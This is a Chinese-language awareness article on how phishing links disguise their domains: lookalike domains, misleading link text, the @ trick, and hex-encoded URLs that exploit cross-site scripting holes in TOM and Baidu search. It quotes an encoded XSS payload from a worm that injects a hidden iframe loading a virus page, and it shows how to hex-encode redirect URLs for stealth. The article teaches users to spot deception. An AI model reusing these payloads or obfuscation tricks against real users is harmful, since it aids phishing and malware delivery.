骗子网站域名伪装手法大暴光

    一般常见的社会工程学欺骗有：“腾X公司成立八周年之际，举行回馈活动，详情请登陆XXXX.com”，“我的老婆自拍了很多照片，你看看哪张比较漂亮，XXXXX.photo.com”，“听说同事小刘建立色情网站被抓了，新闻在这里呢，YYYYY.NEW.COM”。

    这些信息也是带有很明显的欺骗性和诱惑性，不少IM用户只要一不注意就会去点击进入。一般这些地址连接的网站都是一些传播病毒的网站或者是钓鱼网站，还有一种是为了刷流量而做的网站。

    不过大部分用户还是具有一定的知识和警惕的，一些比较陌生的域名或者是明显伪装的域名，用户都会察觉而导致欺骗失败。黑客而为了提高其可信度，就对其域名地址进行伪装。下面我们来讲解一下常见的域名伪装手段：
注：以下文章将域名称为URL。

1． 超级连接欺骗法。
此方法一般存在于网站，BBS，BLOG等WEB站点，在IM软件方面就没有用处了。
型如：

    图中是对超级连接进行编辑的过程。文本框上写的是www.baidu.com，而实际上超级连接指向的地址却是http://www.qq.com。这个惯性思维误导在一定程度上也会欺骗了不少粗心的用户。其实我们要发现它，只需要对准超级连接时查看浏览器底部的提示，右键点击连接，选择属性来查看URL地址。

图2为查看属性，图3为浏览器底部信息。

2． 相似字符伪装法
此方法应用广泛，IM，WEB站点等都可以应用。

    一般的URL的后缀有.cn/.com/.com.cn/.net/.net.cn/.org/.org.cn等等，黑客就是利用了这些差别进行误导。黑客可以通过注册一个类似的域名来进行欺骗。

    型如：
    腾讯网站的URL是QQ.com，那么黑客就可以通过注册一个类似的域名：QQ.cn，QQ.com.cn，qq.org.cn等等。假如没有仔细辨认的话很容易就会被误导，而且一般这类URL指向的都是伪腾讯网站程序的站点，不仔细辨认还真的会被欺骗，假如站点上是说在办活动，需要你输入QQ的号码和密码，广大用户一不小心就会被黑客盗取帐号。
还有一些更加难以辨认的，型如：www.163.com和www.l63.com(当中是小写字母L)，数字1和字母l，字母O和数字0，多一个s，少一个s，加入-或者_这两个符号，重复或者少字母，把两个字母换位置等。

3． URL字符HEX转换法
经常会看到这样的QQ尾巴：“看了吗，的视频新闻，刘若英全裸演出，勇露三点！！！http://search.tom.com/s.php?w=%3C%2Ftitle%3E%22%3Ciframe+src%3D%27http%3A%2F%2F%77%65%62%2e%79%75%6c%65%74%74%2e%63%6e%2f%63%2e%68%74%6d%27+width%3D0+height%3D0%3E%3C%2Fiframe%3E+&edt=07k”这个QQ尾巴比较特殊，利用了TOM搜索的过滤漏洞{此漏洞昨晚被补上了。不好意思。无法让各位实践。}那个URL的字符进行了HEX转换。其实那个漏洞是利用TOM搜索的过程中没有对一些HTML命令进行过滤而导致跨站，它这里搜索的字符是
"，其中的
http://web.yulett.c**/***.htm就是病毒网页。只要你打开了那个TOM搜索连接，也就同时打开了这个网页。（因安全缘故隐去部分地址）
以前很多大网站甚至银行都存在此类跨站漏洞，现在基本都修补完毕了。百度还有百度知道等地方也曾被利用跨站。不过最近发现百度的MP3搜索频道还是存在跨站漏洞，还未修复，本人也发现并截获了利用此漏洞的QQ尾巴蠕虫病毒，已经通知了百度的工作人员。漏洞大概会在短期内修复。型如：http://mp3.baidu.com/tring?url= http://hi.baidu.com/greysign
这个漏洞主要是打开以后会执行tring?url=后面的任意URL而导致的跨站。假如我们结合一下HEX转换，把后面部分字符转换成HEX代码。就更加隐蔽，具有迷惑性。

修改后的代码：
http://mp3.baidu.com/tring?url=%68%74%74%70%3a%2f%2f%68%69%2e%62%61%69%64%75%2e%63%6f%6d%2f%67%72%65%79%73%69%67%6e
和上面未转换的代码具有同样的效果。

4． 万能的@大法
这方法在IE7已经无效，在火狐浏览器，Opera浏览器会遭遇提示。

其他的浏览器还是默默地做了黑客的从犯。包括我们最常用到的IE6。

代码型如：http://www.baidu.com@www.qq.com
假如你在浏览器输入以上地址。你会发现打开的网站是qq.com而不是百度。相信你已经看出来了吧。域名在被浏览器解析的时候，只执行了@后面的URL，并且没有任何提示，这也就给了黑客的可趁之机，不明所以的用户又遭殃了。而且很多人即使被欺骗以后还是没有发觉出来……这也是小G将这些域名伪装手法大暴光的原因之一。
同样，我们将那个URL中@ 后面的字符进行了HEX转换来加强伪装效果。
修改后代码为：http://www.baidu.com@%77%77%77%2e%71%71%2e%63%6f%6d
不影响执行。

    所以各位网友以后看到URL带@的话还要记得擦亮眼睛多看清楚地址。注：HEX是指将字符的ASCII编码进行16进制转换。例如字母a的10进制ASCII编码是97，HEX之后就是%61了。

    这些伪装手段，有的利用了著名站点的跨站漏洞，有的利用.了字符的相似，用户的粗心，也有的是利用一些简单的技术手段来实现伪装。总而言之，没有绝对的安全，我们只能通过不断学习知识来保护自己的爱机了，相信你看完本文会掌握一些关于网络欺骗，钓鱼和域名伪装的相关知识。

    截止至今日，百度的图片搜索跨站漏洞，百度知道跨站漏洞，MP3频道跨站漏洞已经全部修补完毕了，虽然我已经上报了好几个月，不过毕竟已经修复好了。最近流行的跨站漏洞是雅虎的：http://cn.wrs.yahoo.com/*http://www.google.com/